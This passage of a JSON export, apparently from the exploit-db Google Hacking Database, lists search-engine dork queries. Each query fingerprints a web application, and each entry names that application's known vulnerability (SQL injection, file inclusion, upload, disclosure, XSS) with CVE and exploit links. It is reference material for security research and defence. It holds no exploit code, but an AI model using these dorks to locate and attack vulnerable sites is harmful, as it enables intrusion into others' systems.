Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:/downlot.php%3Ffile%3D", "shortDescription": "inurl:/downlot.php?file=", "textualDescription": "Lokomedia CMS (sukaCMS) Local File Disclosure Vulnerability - CVE: 2010-2018: http://www.exploit-db.com/exploits/12651" }, { "signatureReferenceNumber": "2405", "link": "https://www.exploit-db.com/ghdb/2405/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+Fantastic+News+v2.1.2%22+or+%22Powered+by+Fantastic+News+v2.1.3%22", "shortDescription": "\"Powered by Fantastic News v2.1.2\" or \"Powered by Fantastic News v2.1.3\"", "textualDescription": "Fantastic News 2.1.3 (script_path) Remote File Include Vulnerability - CVE: 2006-4285: http://www.exploit-db.com/exploits/2221" }, { "signatureReferenceNumber": "2407", "link": "https://www.exploit-db.com/ghdb/2407/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:treplies.asp%3Fmessage%3D+++++intitle:ASP+Talk", "shortDescription": "inurl:treplies.asp?message= intitle:ASP Talk", "textualDescription": "ASP Talk (SQL/CSS) Multiple Remote Vulnerabilities: http://www.exploit-db.com/exploits/7378" }, { "signatureReferenceNumber": "2408", "link": "https://www.exploit-db.com/ghdb/2408/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22read.asp%3FfID%3D%22", "shortDescription": "inurl:\"read.asp?fID=\"", "textualDescription": "JiRo?s FAQ Manager (read.asp fID) SQL Injection Vulnerability - CVE: 2008-2691: http://www.exploit-db.com/exploits/5753" }, { "signatureReferenceNumber": "2409", "link": "https://www.exploit-db.com/ghdb/2409/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22MidiCart+PHP+Database+Management%22", "shortDescription": "\"MidiCart PHP Database Management\"", "textualDescription": "MidiCart PHP,ASP Shell Upload Vulnerability: http://www.exploit-db.com/exploits/12636" }, { "signatureReferenceNumber": "2410", "link": "https://www.exploit-db.com/ghdb/2410/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+By+The+Black+Lily+2007%22", "shortDescription": "\"Powered By The Black Lily 2007\"", "textualDescription": "Black Lily 2007 (products.php class) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/4444" }, { "signatureReferenceNumber": "2411", "link": "https://www.exploit-db.com/ghdb/2411/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22simpleblog3%22", "shortDescription": "inurl:\"simpleblog3\"", "textualDescription": "SimpleBlog 3.0 (simpleBlog.mdb) Database Disclosure Vulnerability: http://www.exploit-db.com/exploits/7232" }, { "signatureReferenceNumber": "2412", "link": "https://www.exploit-db.com/ghdb/2412/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allinurl:/m2f_usercp.php%3F", "shortDescription": "allinurl:/m2f_usercp.php?", "textualDescription": "mail2forum phpBB Mod 1.2 (m2f_root_path) Remote Include Vulns - CVE: 2006-3735: http://www.exploit-db.com/exploits/2019" }, { "signatureReferenceNumber": "2413", "link": "https://www.exploit-db.com/ghdb/2413/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=powered+by+Dreampics+Builder", "shortDescription": "powered by Dreampics Builder", "textualDescription": "Dreampics Builder (page) Remote SQL Injection Vulnerability - CVE: 2008-3119: http://www.exploit-db.com/exploits/6034" }, { "signatureReferenceNumber": "2414", "link": "https://www.exploit-db.com/ghdb/2414/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22classifide_ad.php%22", "shortDescription": "inurl:\"classifide_ad.php\"", "textualDescription": "AJ Auction 6.2.1 (classifide_ad.php) SQL Injection Vulnerability - CVE: 2008-5212: http://www.exploit-db.com/exploits/5591" }, { "signatureReferenceNumber": "2415", "link": "https://www.exploit-db.com/ghdb/2415/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=[+Web+Wiz+Forums%C2%AE+version+9.64+[Free+Express+Edition]+]", "shortDescription": "[ Web Wiz Forums\u00ae version 9.64 [Free Express Edition] ]", "textualDescription": "Web Wiz Forums v9.64 Database Disclosure Vulnerability: http://www.exploit-db.com/exploits/10638" }, { "signatureReferenceNumber": "2417", "link": "https://www.exploit-db.com/ghdb/2417/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:/jobsearchengine/", "shortDescription": "inurl:/jobsearchengine/", "textualDescription": "I-Net MLM Script Engine SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14080" }, { "signatureReferenceNumber": "2419", "link": "https://www.exploit-db.com/ghdb/2419/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allinurl:%22com_n-gallery%22", "shortDescription": "allinurl:\"com_n-gallery\"", "textualDescription": "Mambo Component n-gallery Multiple SQL Injection Vulnerabilities: http://www.exploit-db.com/exploits/5980" }, { "signatureReferenceNumber": "2421", "link": "https://www.exploit-db.com/ghdb/2421/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Copyright+2006+%C3%82%C2%A9+Flax+Article+Manager+v1.1", "shortDescription": "Copyright 2006 \u00c2\u00a9 Flax Article Manager v1.1", "textualDescription": "Flax Article Manager 1.1 Remote PHP Script Upload Vulnerability: http://www.exploit-db.com/exploits/7884" }, { "signatureReferenceNumber": "2424", "link": "https://www.exploit-db.com/ghdb/2424/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:com_pinboard", "shortDescription": "inurl:com_pinboard", "textualDescription": "Joomla Component com_pinboard Remote File Upload Vulnerability: http://www.exploit-db.com/exploits/9011" }, { "signatureReferenceNumber": "2425", "link": "https://www.exploit-db.com/ghdb/2425/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22%C3%82%C2%A9+2005-2006+Powered+by+eSyndiCat+Link+Exchange+Script%22", "shortDescription": "\"\u00c2\u00a9 2005-2006 Powered by eSyndiCat Link Exchange Script\"", "textualDescription": "eSyndiCat Link Exchange Script 2005-2006 SQL Injection Vulnerability - CVE: 2007-6543: http://www.exploit-db.com/exploits/4791" }, { "signatureReferenceNumber": "2426", "link": "https://www.exploit-db.com/ghdb/2426/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=cat_sell.php%3Fcid%3D++or++selloffers.php%3Fcid%3D", "shortDescription": "cat_sell.php?cid= or selloffers.php?cid=", "textualDescription": "B2B Trading Marketplace SQL Injection Vulnerability - CVE: 2005-3937: http://www.exploit-db.com/exploits/10656" }, { "signatureReferenceNumber": "2427", "link": "https://www.exploit-db.com/ghdb/2427/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=+%22Powered+By+Azadi+Network%22", "shortDescription": "\"Powered By Azadi Network\"", "textualDescription": "Azadi Network (page) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10830" }, { "signatureReferenceNumber": "2428", "link": "https://www.exploit-db.com/ghdb/2428/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+i-pos+Storefront%22", "shortDescription": "\"Powered by i-pos Storefront\"", "textualDescription": "I-Pos Internet Pay Online Store 1.3 Beta SQL Injection Vulnerability - CVE: 2008-2634: http://www.exploit-db.com/exploits/5717" }, { "signatureReferenceNumber": "2429", "link": "https://www.exploit-db.com/ghdb/2429/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=intitle:%22ASP+inline+corporate+calendar%22+++inurl:.asp%3Fid%3D", "shortDescription": "intitle:\"ASP inline corporate calendar\" inurl:.asp?id=", "textualDescription": "ASP Inline Corporate Calendar (SQL/XSS) Multiple Remote Vulnerabilities - CVE: 2009-2243: http://www.exploit-db.com/exploits/8756" }, { "signatureReferenceNumber": "2430", "link": "https://www.exploit-db.com/ghdb/2430/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:friend.php%3Fop%3DFriendSend", "shortDescription": "inurl:friend.php?op=FriendSend", "textualDescription": "PHP-Nuke 'friend.php' Module Remote SQL Injection: http://www.exploit-db.com/exploits/12525" }, { "signatureReferenceNumber": "2431", "link": "https://www.exploit-db.com/ghdb/2431/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:com_gamesbox", "shortDescription": "inurl:com_gamesbox", "textualDescription": "Joomla Component Gamesbox com_gamesbox 1.0.2 (id) SQL Injection Vulnerability - CVE: 2010-2690: http://www.exploit-db.com/exploits/14126" }, { "signatureReferenceNumber": "2432", "link": "https://www.exploit-db.com/ghdb/2432/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+INVOhost%22", "shortDescription": "\"Powered by INVOhost\"", "textualDescription": "INVOhost SQL Injection - CVE: 2010-1336: http://www.exploit-db.com/exploits/11874" }, { "signatureReferenceNumber": "2433", "link": "https://www.exploit-db.com/ghdb/2433/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+WebStudio+eHotel%22", "shortDescription": "\"Powered by WebStudio eHotel\"", "textualDescription": "WebStudio eHotel (pageid) Blind SQL Injection Vulnerability - CVE: 2008-5293: http://www.exploit-db.com/exploits/7222" }, { "signatureReferenceNumber": "2435", "link": "https://www.exploit-db.com/ghdb/2435/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:com_redshop", "shortDescription": "inurl:com_redshop", "textualDescription": "Joomla redSHOP Component v1.0 (com_redshop pid) SQL Injection Vulnerability - CVE: 2010-2694: http://www.exploit-db.com/exploits/14312" }, { "signatureReferenceNumber": "2436", "link": "https://www.exploit-db.com/ghdb/2436/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+yacs%22", "shortDescription": "\"Powered by yacs\"", "textualDescription": "YACS CMS 8.11 update_trailer.php Remote File Inclusion Vulnerability: http://www.exploit-db.com/exploits/8066" }, { "signatureReferenceNumber": "2437", "link": "https://www.exploit-db.com/ghdb/2437/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22(C)+by+CyberTeddy%22", "shortDescription": "\"(C) by CyberTeddy\"", "textualDescription": "WebLog (index.php file) Remote File Disclosure Vulnerability - CVE: 2007-1487: http://www.exploit-db.com/exploits/3484" }, { "signatureReferenceNumber": "2438", "link": "https://www.exploit-db.com/ghdb/2438/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+Shout!%22", "shortDescription": "\"Powered by Shout!\"", "textualDescription": "ShoutCMS (content.php) Blind Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11305" }, { "signatureReferenceNumber": "2440", "link": "https://www.exploit-db.com/ghdb/2440/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%222007+BookmarkX+script%22", "shortDescription": "\"2007 BookmarkX script\"", "textualDescription": "BookmarkX script 2007 (topicid) Remote SQL Injection Vulnerability - CVE: 2008-0695: http://www.exploit-db.com/exploits/5040" }, { "signatureReferenceNumber": "2441", "link": "https://www.exploit-db.com/ghdb/2441/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Doop+CMS", "shortDescription": "Doop CMS", "textualDescription": "doop CMS 1.3.7 (page) Local File Inclusion Vulnerability - CVE: 2007-5465: http://www.exploit-db.com/exploits/4536" }, { "signatureReferenceNumber": "2442", "link": "https://www.exploit-db.com/ghdb/2442/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22powered+by+sazcart%22", "shortDescription": "\"powered by sazcart\"", "textualDescription": "SazCart 1.5 (cart.php) Remote File Include Vulnerability - CVE: 2006-5727: http://www.exploit-db.com/exploits/2718" }, { "signatureReferenceNumber": "2443", "link": "https://www.exploit-db.com/ghdb/2443/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:com_community", "shortDescription": "inurl:com_community", "textualDescription": "Joomla Template BizWeb com_community Persistent XSS Vulnerability: http://www.exploit-db.com/exploits/13955" }, { "signatureReferenceNumber": "2444", "link": "https://www.exploit-db.com/ghdb/2444/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allinurl:%22/questcms/%22", "shortDescription": "allinurl:\"/questcms/\"", "textualDescription": "Questcms (XSS/Directory Traversal/SQL) Multiple Remote Vulnerabilities - CVE: 2008-4773: http://www.exploit-db.com/exploits/6853" }, { "signatureReferenceNumber": "2446", "link": "https://www.exploit-db.com/ghdb/2446/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:news.php%3Fmode%3Dvoir", "shortDescription": "inurl:news.php?mode=voir", "textualDescription": "TR News 2.1 (nb) Remote SQL Injection Vulnerability - CVE: 2008-1957: http://www.exploit-db.com/exploits/5483" }, { "signatureReferenceNumber": "2447", "link": "https://www.exploit-db.com/ghdb/2447/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22+Powered+by+Pie+Cart+Pro+%22", "shortDescription": "\" Powered by Pie Cart Pro \"", "textualDescription": "Pie Cart Pro (Home_Path) Remote File Include Vulnerability - CVE: 2006-4970: http://www.exploit-db.com/exploits/2392" }, { "signatureReferenceNumber": "2448", "link": "https://www.exploit-db.com/ghdb/2448/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allinurl:readmore.php%3Fnews_id", "shortDescription": "allinurl:readmore.php?news_id", "textualDescription": "PHP-Fusion v4.01 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12635" }, { "signatureReferenceNumber": "2449", "link": "https://www.exploit-db.com/ghdb/2449/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:index.php%3Fini[langpack]%3D", "shortDescription": "inurl:index.php?ini[langpack]=", "textualDescription": "Weatimages 1.7.1 ini[langpack] Remote File Inclusion Vulnerability - CVE: 2007-1999: http://www.exploit-db.com/exploits/3700" }, { "signatureReferenceNumber": "2450", "link": "https://www.exploit-db.com/ghdb/2450/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+Elgg,+the+leading+open+source+social+networking+platform%22", "shortDescription": "\"Powered by Elgg, the leading open source social networking platform\"", "textualDescription": "elgg 1.5 (/_css/js.php) Local File Inclusion Vulnerability - CVE: 2009-3149: http://www.exploit-db.com/exploits/9355" }, { "signatureReferenceNumber": "2451", "link": "https://www.exploit-db.com/ghdb/2451/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:/index.php%3Foption%3Dcom_yellowpages", "shortDescription": "inurl:/index.php?option=com_yellowpages", "textualDescription": "Joomla Yellowpages SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14592" }, { "signatureReferenceNumber": "2452", "link": "https://www.exploit-db.com/ghdb/2452/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allinurl:%22channel_detail.php%3Fchid%3D%22", "shortDescription": "allinurl:\"channel_detail.php?chid=\"", "textualDescription": "YouTube Clone Script (msg.php id) Remote SQL Injection Vulnerability - CVE: 2007-3518: http://www.exploit-db.com/exploits/4136" }, { "signatureReferenceNumber": "2453", "link": "https://www.exploit-db.com/ghdb/2453/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:apages.php", "shortDescription": "inurl:apages.php", "textualDescription": "Arab Network Tech. (ANT) CMS SQL Injection: http://www.exploit-db.com/exploits/11339" }, { "signatureReferenceNumber": "2454", "link": "https://www.exploit-db.com/ghdb/2454/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Emanuele+Guadagnoli%22+%22CcMail%22", "shortDescription": "\"Emanuele Guadagnoli\" \"CcMail\"", "textualDescription": "CcMail" }, { "signatureReferenceNumber": "2456", "link": "https://www.exploit-db.com/ghdb/2456/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=This+FAQ+is+powered+by+CascadianFAQ", "shortDescription": "This FAQ is powered by CascadianFAQ", "textualDescription": "CascadianFAQ 4.1 (index.php) Remote SQL Injection Vulnerability - CVE: 2007-0631: http://www.exploit-db.com/exploits/3227" }, { "signatureReferenceNumber": "2457", "link": "https://www.exploit-db.com/ghdb/2457/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Designed+%26+Developed+by+net-finity%22", "shortDescription": "\"Designed & Developed by net-finity\"", "textualDescription": "net-finity (links.php) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/4629" }, { "signatureReferenceNumber": "2458", "link": "https://www.exploit-db.com/ghdb/2458/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=intext:Powered+by+CPA+Site+Solutions", "shortDescription": "intext:Powered by CPA Site Solutions", "textualDescription": "CPA Site Solutions Remote File Upload Vulnerability: http://www.exploit-db.com/exploits/11365" }, { "signatureReferenceNumber": "2460", "link": "https://www.exploit-db.com/ghdb/2460/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22site+powered+by+intuitive-websites.com%22", "shortDescription": "\"site powered by intuitive-websites.com\"", "textualDescription": "intuitive (form.php) Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11481" }, { "signatureReferenceNumber": "2461", "link": "https://www.exploit-db.com/ghdb/2461/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=ClearBudget+v0.6.1", "shortDescription": "ClearBudget v0.6.1", "textualDescription": "ClearBudget 0.6.1 Insecure Cookie Handling / LFI Vulnerabilities: http://www.exploit-db.com/exploits/7992" }, { "signatureReferenceNumber": "2464", "link": "https://www.exploit-db.com/ghdb/2464/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:func%3Dselectcat+%2B+com_remository", "shortDescription": "inurl:func=selectcat + com_remository", "textualDescription": "Mambo Component RemoSitory (cat) Remote SQL Injection Vulnerability - CVE: 2007-4505: http://www.exploit-db.com/exploits/4306" }, { "signatureReferenceNumber": "2465", "link": "https://www.exploit-db.com/ghdb/2465/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22ShopMaker+v1.0%22", "shortDescription": "\"ShopMaker v1.0\"", "textualDescription": "ShopMaker 1.0 (product.php id) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/6799" }, { "signatureReferenceNumber": "2466", "link": "https://www.exploit-db.com/ghdb/2466/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+jSite+1.0+OE%22", "shortDescription": "\"Powered by jSite 1.0 OE\"", "textualDescription": "jSite 1.0 OE (SQL/LFI) Multiple Remote Vulnerabilities - CVE: 2008-3192: http://www.exploit-db.com/exploits/6057" }, { "signatureReferenceNumber": "2467", "link": "https://www.exploit-db.com/ghdb/2467/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+Online+Email+Manager", "shortDescription": "Powered by Online Email Manager", "textualDescription": "Online Email Manager Insecure Cookie Handling Vulnerability: http://www.exploit-db.com/exploits/8476" }, { "signatureReferenceNumber": "2468", "link": "https://www.exploit-db.com/ghdb/2468/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Web+Site+Design+by+Red+Cat+Studios%22", "shortDescription": "\"Web Site Design by Red Cat Studios\"", "textualDescription": "Realtor WebSite System E-Commerce idfestival SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12776" }, { "signatureReferenceNumber": "2471", "link": "https://www.exploit-db.com/ghdb/2471/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22webboard/view.php%3Ftopic%3D%22", "shortDescription": "inurl:\"webboard/view.php?topic=\"", "textualDescription": "Webboard v.2.90 beta Remote File Disclosure Vulnerability - CVE: 2009-2600: http://www.exploit-db.com/exploits/8823" }, { "signatureReferenceNumber": "2472", "link": "https://www.exploit-db.com/ghdb/2472/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=/index.php%3Foption%3Dcom_restaurante", "shortDescription": "/index.php?option=com_restaurante", "textualDescription": "Joomla Component Restaurante Remote File Upload Vulnerability - CVE: 2007-4817: http://www.exploit-db.com/exploits/4383" }, { "signatureReferenceNumber": "2473", "link": "https://www.exploit-db.com/ghdb/2473/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_portfol%22", "shortDescription": "inurl:\"com_portfol\"", "textualDescription": "Joomla Component Portfol (vcatid) SQL Injection Vulnerability - CVE: 2009-0494: http://www.exploit-db.com/exploits/7734" }, { "signatureReferenceNumber": "2476", "link": "https://www.exploit-db.com/ghdb/2476/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Copyright+%C2%A9+2010+ASP+SiteWare.+All+rights+reserved.", "shortDescription": "Copyright \u00a9 2010 ASP SiteWare. All rights reserved.", "textualDescription": "MSSQLi Vulnerability in AutoDealer Ver.1 and Ver.2 - CVE: 2007-0053: http://www.exploit-db.com/exploits/12462" }, { "signatureReferenceNumber": "2477", "link": "https://www.exploit-db.com/ghdb/2477/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=intitle:%22DUcalendar+1.0%22", "shortDescription": "intitle:\"DUcalendar 1.0\"", "textualDescription": "DUcalendar 1.0 (detail.asp iEve) Remote SQL Injection Vulnerability - CVE: 2008-2868: http://www.exploit-db.com/exploits/5927" }, { "signatureReferenceNumber": "2479", "link": "https://www.exploit-db.com/ghdb/2479/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:/infusions/e_cart", "shortDescription": "inurl:/infusions/e_cart", "textualDescription": "PHP-Fusion Mod E-Cart 1.3 (items.php CA) SQL Injection Vulnerability - CVE: 2009-0832: http://www.exploit-db.com/exploits/7698" }, { "signatureReferenceNumber": "2480", "link": "https://www.exploit-db.com/ghdb/2480/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=intext:%22RPG+Inferno+is+not+available+to+guests%22+or+intext:%22Battle+Ground+%C3%82%C2%B7+Clans+%C3%82%C2%B7+Store+%C3%82%C2%B7+Jobs+%C3%82%C2%B7+Auction+%C3%82%C2%B7+Spells+Shop+%C3%82%C2%B7+Statistic", "shortDescription": "intext:\"RPG Inferno is not available to guests\" or intext:\"Battle Ground \u00c2\u00b7 Clans \u00c2\u00b7 Store \u00c2\u00b7 Jobs \u00c2\u00b7 Auction \u00c2\u00b7 Spells Shop \u00c2\u00b7 Statistics \u00c2\u00b7 Member List\"", "textualDescription": "vBulletin Mod RPG Inferno 2.4 (inferno.php) SQL Injection Vulnerability - CVE: 2007-3687: http://www.exploit-db.com/exploits/4166" }, { "signatureReferenceNumber": "2484", "link": "https://www.exploit-db.com/ghdb/2484/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:com_jstore", "shortDescription": "inurl:com_jstore", "textualDescription": "joomla com_jstore SQLi Vulnerability: http://www.exploit-db.com/exploits/13796" }, { "signatureReferenceNumber": "2485", "link": "https://www.exploit-db.com/ghdb/2485/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=APBoard+2.1.0+%C2%A9+2003-2010+APP+-+Another+PHP+Program", "shortDescription": "APBoard 2.1.0 \u00a9 2003-2010 APP - Another PHP Program", "textualDescription": "APBoard v2.1.0 ( board.php?id=) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14559" }, { "signatureReferenceNumber": "2486", "link": "https://www.exploit-db.com/ghdb/2486/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allintext:%22Browse+our+directory+of+our+members+top+sites+or+create+your+own+for+free!%22", "shortDescription": "allintext:\"Browse our directory of our members top sites or create your own for free!\"", "textualDescription": "PHP123 Top Sites (category.php cat) Remote SQL Injection Vuln - CVE: 2007-4054: http://www.exploit-db.com/exploits/4241" }, { "signatureReferenceNumber": "2487", "link": "https://www.exploit-db.com/ghdb/2487/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allinurl:flashblog.html+%22flashblog%22", "shortDescription": "allinurl:flashblog.html \"flashblog\"", "textualDescription": "FlashBlog (articulo_id) Remote SQL Injection Vulnerability - CVE: 2008-2572: http://www.exploit-db.com/exploits/5685" }, { "signatureReferenceNumber": "2489", "link": "https://www.exploit-db.com/ghdb/2489/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=com_easybook", "shortDescription": "com_easybook", "textualDescription": "Joomla Component EasyBook 1.1 (gbid) SQL Injection - CVE: 2008-2569: http://www.exploit-db.com/exploits/5740" }, { "signatureReferenceNumber": "2490", "link": "https://www.exploit-db.com/ghdb/2490/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:index.php%3Foption%3Dcom_nicetalk", "shortDescription": "inurl:index.php?option=com_nicetalk", "textualDescription": "Joomla Component Nice Talk 0.9.3 (tagid) SQL Injection Vulnerability - CVE: 2007-4503: http://www.exploit-db.com/exploits/4308" }, { "signatureReferenceNumber": "2491", "link": "https://www.exploit-db.com/ghdb/2491/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22ParsBlogger++%3F+2006.+All+rights+reserved%22", "shortDescription": "\"ParsBlogger ? 2006. All rights reserved\"", "textualDescription": "ParsBlogger (links.asp id) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/6745" }, { "signatureReferenceNumber": "2492", "link": "https://www.exploit-db.com/ghdb/2492/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+CMScout+(c)2005+CMScout+Group", "shortDescription": "Powered by CMScout (c)2005 CMScout Group", "textualDescription": "CMScout (XSS/HTML Injection) Multiple Vulnerabilities - CVE: 2010-2154: http://www.exploit-db.com/exploits/12806" }, { "signatureReferenceNumber": "2493", "link": "https://www.exploit-db.com/ghdb/2493/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=powered+by+minimal+Gallery+0.8", "shortDescription": "powered by minimal Gallery 0.8", "textualDescription": "minimal Gallery 0.8 Remote File Disclosure Vulnerability - CVE: 2008-0259: http://www.exploit-db.com/exploits/4902" }, { "signatureReferenceNumber": "2494", "link": "https://www.exploit-db.com/ghdb/2494/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=powered+by+sX-Shop", "shortDescription": "powered by sX-Shop", "textualDescription": "sX-Shop (view_image.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14557" }, { "signatureReferenceNumber": "2495", "link": "https://www.exploit-db.com/ghdb/2495/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_ignitegallery%22", "shortDescription": "inurl:\"com_ignitegallery\"", "textualDescription": "Joomla Component Ignite Gallery 0.8.3 SQL Injection Vulnerability - CVE: 2008-6182: http://www.exploit-db.com/exploits/6723" }, { "signatureReferenceNumber": "2497", "link": "https://www.exploit-db.com/ghdb/2497/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:com_brightweblinks", "shortDescription": "inurl:com_brightweblinks", "textualDescription": "Joomla Component com_brightweblinks (catid) SQL Injection Vulnerability - CVE: 2008-3083: http://www.exploit-db.com/exploits/5993" }, { "signatureReferenceNumber": "2498", "link": "https://www.exploit-db.com/ghdb/2498/", "category": "Advisories and Vulnerabilities", "querystring": 